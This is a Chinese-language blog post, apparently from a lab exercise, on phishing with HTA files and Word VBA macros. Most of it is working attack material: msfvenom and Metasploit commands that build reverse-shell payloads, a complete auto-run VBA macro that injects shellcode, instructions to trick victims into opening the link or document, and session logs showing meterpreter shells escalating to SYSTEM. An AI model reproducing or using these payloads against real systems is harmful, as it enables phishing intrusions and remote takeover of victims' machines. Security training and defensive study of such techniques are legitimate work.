HTA和VBA钓鱼技术

HTA

法一:通过投送payload,反弹shell

使用msfvenom生成payload:

user@machine$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7692 bytes
Saved as: thm.hta

攻击机监听:

nc -lnvp 443

攻击机开启网络服务,让目标能够访问生成的payload:

user@machine$ python3 -m http.server 8090
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/)

诱导受害者点击连接:http://10.8.232.37:8090/payload.hta,当用户打开后,点击弹出的运行(run)后,既可上线shell:

image-20250410161557177

image-20250410161635902

法二:通过msf直接生成url-payload

使用msf直接创建url的payload,将生成的url发送给受害者诱使其点击:

msf6 > use exploit/windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set LHOST 10.8.232.37
LHOST => 10.8.232.37
msf6 exploit(windows/misc/hta_server) > set LPORT 443
LPORT => 443
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.8.232.37
SRVHOST => 10.8.232.37
msf6 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.8.232.37:443
[*] Using URL: http://10.8.232.37:8080/TkWV9zkd.hta
[*] Server started.

一旦目标访问即可上线shell:

user@machine$ [*] 10.10.201.254    hta_server - Delivering Payload
[*] Sending stage (175174 bytes) to 10.10.201.254
[*] Meterpreter session 1 opened (10.8.232.37:443 -> 10.10.201.254:61629) at 2021-11-16 06:15:46 -0600
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-1AU6NT4
OS              : Windows 10 (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > shell
Process 4124 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\app>

VBA(doc)

使用msfvenom创建一个VBA的payload:

┌──(root㉿kali)-[/home/kali/Templates]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.117.17 LPORT=443 -f vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of vba file: 2691 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ruxaew As Long, ByVal Cmeflgr As Long, ByVal Onzbovppb As LongPtr, Bxlbqkmbx As Long, ByVal Exhgt As Long, Jyma As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Ooqll As Long, ByVal Onit As Long, ByVal Mksyyx As Long, ByVal Iqtta As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Alid As LongPtr, ByRef Cdzwe As Any, ByVal Gnzaegy As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Ruxaew As Long, ByVal Cmeflgr As Long, ByVal Onzbovppb As Long, Bxlbqkmbx As Long, ByVal Exhgt As Long, Jyma As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Ooqll As Long, ByVal Onit As Long, ByVal Mksyyx As Long, ByVal Iqtta As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Alid As Long, ByRef Cdzwe As Any, ByVal Gnzaegy As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Rwvjscoep As Long, Emvu As Variant, Fci As Long
#If Vba7 Then
        Dim  Rhgrl As LongPtr, Xgld As LongPtr
#Else
        Dim  Rhgrl As Long, Xgld As Long
#EndIf
        Emvu = Array(252,232,143,0,0,0,96,49,210,100,139,82,48,139,82,12,137,229,139,82,20,15,183,74,38,49,255,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,87,139,66,60,1,208,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,1,211,80,133,201,116,60,73,139, _
52,139,1,214,49,255,49,192,193,207,13,172,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,10,10,117,17,104,2,0,1,187,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

        Rhgrl = VirtualAlloc(0, UBound(Emvu), &H1000, &H40)
        For Fci = LBound(Emvu) To UBound(Emvu)
                Rwvjscoep = Emvu(Fci)
                Xgld = RtlMoveMemory(Rhgrl + Fci, Rwvjscoep, 1)
        Next Fci
        Xgld = CreateThread(0, 0, Rhgrl, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Document_Open()
        Auto_Open
End Sub

PS:这里需要做一项修改才能使其工作。这里的输出将在 MS Excel 表格上工作。因此,需要将 Workbook_Open()修改为 Document_Open()以使其适用于 MS Word 文档。

创建一个宏:

image-20250410162800910

创建后在弹出的框中输入生成的payload:

image-20250410163021903

并保存为Word 97-2003 模板:

image-20250410163236039

将其发送给受害者并诱使其打开文件,攻击者开启msf的监听:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.117.17
lhost => 10.10.117.17
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > run
[-] Handler failed to bind to 10.10.117.17:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >

一旦受害者打开文档,那么就会得到shell:

[*] Meterpreter session 4 opened (10.10.117.17:443 -> 10.10.232.227:49781) at 2025-04-10 09:39:01 +0100

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-1AU6NT4  10.10.117.17:443 -> 10.10.232.227:49735 (10.10.232.227)
  4         meterpreter x86/windows  DESKTOP-1AU6NT4\thm @ DESKTOP-1AU6NT4  10.10.117.17:443 -> 10.10.232.227:49781 (10.10.232.227)

msf6 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ps
……
 1704  712   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
……

meterpreter > migrate 1944
[*] Migrating from 2844 to 1944...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
posted @ 2025-12-04 16:25  shinianyunyan  阅读(2)  评论(0)    收藏  举报